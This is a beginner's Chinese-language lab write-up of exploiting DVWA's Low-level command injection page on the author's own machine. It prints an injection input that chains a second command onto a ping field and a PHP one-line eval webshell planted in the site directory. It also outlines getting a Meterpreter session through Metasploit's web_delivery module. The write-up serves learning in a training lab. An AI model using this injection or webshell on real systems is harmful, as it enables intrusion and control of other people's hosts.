_> 写在最前
小白第一次写学习记录,文中不足之处还请多多见谅。
1. 环境介绍
- 靶机: Windows 10 专业版 22H2
- 攻击机:Kali
- 网站软件:PhpStudy
- 靶场:DVWA
就不演示搭建过程了(主要是懒)。
2.测试网页介绍
本次测试的网页如下:
难度等级:Low
主要是学习怎么用代码注入和MSF的结合去控制主机(当然用WebShell去连接更简单)
- 首先分析此页面使用的是命令拼接的方式来实现功能的,所以我在正常的Ping xxx 后面又加上了 “&” ,由此尝试可不可以执行别的命令,结果如上图。
// 输入的语句
baidu.com & python --version
点击Submit, 发现返回了Python的版本号!
3.游戏开始
可以得出,服务器上是安装了Python的,我电脑确实是如此。
既然都那么痛快了,就利用MSF来生成反向连接代码吧!
4.使用MSF生成注入代码
打开Kali虚拟机
启动MSF
搜索 Exploit 模块中的 web_Delivery
使用该模块,设置基本参数
查询本机ip地址并填入
确认生成为Python代码
关键时刻!!!! 创建监听,然后提交代码
网页一直在加载,回到Kali这边 目标已上线!
成功获取到Meterpreter,但却是python/windows会话,查看sysinfo
python类型的Meterpreter对话功能较少,本地尝试提权失败,只能考虑用这个会话再上传免杀木马了,但现在的免杀基本上刚发出来没几天就可能寄掉,鄙人新人一枚,无奈实验到此结束
(其实是因为某白痴费劲心思做的免杀却被无情干掉的痛`(>﹏<)′)静态可免杀,动态就被火绒干掉了,等以后再好好学免杀。)
5.但是!
但还可以上传 一句话木马 来救一救的嘛,无所谓了挣扎一下,早点去刷B站ヾ(≧▽≦)o*
<?php eval($_POST['jntm']); ?>
把webshell.php就藏再站点目录里,然后用蚁剑连接一波
就挺突然的,我整个电脑的硬盘都已经暴露了,可以一览无余
6.总结
本次学习记录就到此结束了,本人实在是没入门的小白,不过每天学习,每天进步,加油!
挺喜欢Kali的新壁纸的,上面写着一句话:
“The quieter you become, the more you are able to hear”
免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。